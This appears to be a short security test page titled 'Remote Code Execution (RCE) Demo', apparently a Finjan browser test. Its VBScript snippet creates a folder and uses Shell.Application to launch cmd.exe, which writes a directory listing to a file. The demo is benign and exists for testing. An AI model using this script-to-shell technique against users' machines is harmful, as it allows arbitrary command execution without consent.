| Test Name: | Remote Code Execution (RCE) Demo |
| Security Status: | ![]() |
| Code: |
Set cf =
CreateObject("Scripting.FileSystemObject") If Not cf.FolderExists("c:/Finjan/") then flag=cf.CreateFolder("c:/Finjan/") End if Set s = CreateObject("Shell.Application") s.ShellExecute "cmd.exe /k dir C:>c:/Finjan/FinjanVbsDemo.txt" |